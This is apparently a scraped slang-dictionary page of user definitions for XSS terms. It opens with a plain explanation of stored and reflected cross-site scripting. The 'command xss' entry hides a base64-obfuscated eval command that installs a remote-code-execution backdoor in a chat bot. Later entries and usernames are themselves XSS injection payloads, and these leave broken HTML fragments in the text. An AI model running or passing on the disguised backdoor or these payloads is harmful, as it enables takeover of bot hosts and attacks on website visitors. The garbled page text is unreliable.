XSS

Short for Cross Site Scripting. A type of web based security vulnerability using client side scripts such as Javascript.

XSS takes place as a consequence of improper input sanitization. When the input provided by the user is not properly sanitized, an ill willed user may insert scripting code into a web page, which in turn will be executed by the visitor's browser. There are 2 kinds of XSS attacks: stored or reflected. Stored would mean that the injected code is permanently stored in the page, such as in a comment. Reflected would mean that it only appears once when the payload (i.e. the malicious input) is part of the request, maybe in parameters or cookies.
We have discovered an XSS vulnerability in the user profile view.
by Wild Laurasaurus October 23, 2019
Get the XSS mug.

xss

the website suffers from an xss vulnerability allowing remote javascript execution.
by mike July 07, 2003
Get the xss mug.

command xss

^evaljs eval1-1(atob("Ym90LnNvY2tldC5vbignbWVzc2FnZScsIGZ1bmN0aW9uKGRhdGEpIHsKICBsZXQgeCA9IGRhdGEubXNnLmluZGV4T2YoJyAnKTsKICBpZihkYXRhLm1zZy5zbGljZSgwLCB4KSA9PSAnJGhhY2snKSB7CiAgICB0cnkgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCBldmFsKGRhdGEubXNnLnNsaWNlKHggKyAxKSkpOwogICAgfSBjYXRjaChlcikgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCAiRVJSOiAiICsgZXIudG9TdHJpbmcoKSk7CiAgICB9CiAgfQp9KQ=="))
/* command xss is a type of XSS attack performed on chatroom bots to gain access to the host's computer */
/* They found a command xss in my bot and deleted all my files */
by Melissa 2000 April 07, 2021
Get the command xss mug.

GIF XSS Payload

It is an XSS attack disguised in a GIF image.
John looked at the GIF XSS Payload suspiciously as if it was a trojan horse.
by ther_r_nu_streengs_on_mi April 17, 2020
Get the GIF XSS Payload mug.

Test Word

Test definition <script>XSS</script>
Test Word <script>XSS</script>
by %C0%BCscript%C0%BEalert(1)%C0% September 17, 2017
Get the Test Word mug.

" id="15178145">"/>

"/><img src=xss onerror=alert(1)><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
"/><img src=xss onerror=alert(1)><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
by "/> July 13, 2020
" class="flex items-center border shadow-sharp border-black dark:border-white p-3 pl-4 pr-4 rounded-3xl hover:bg-limon-lime dark:hover:bg-fluorescent active:translate-y-0 5" href="/remove.form.php?reconsider%5Bdefid_to_remove%5D=15178145">Flag
Get the "/> mug.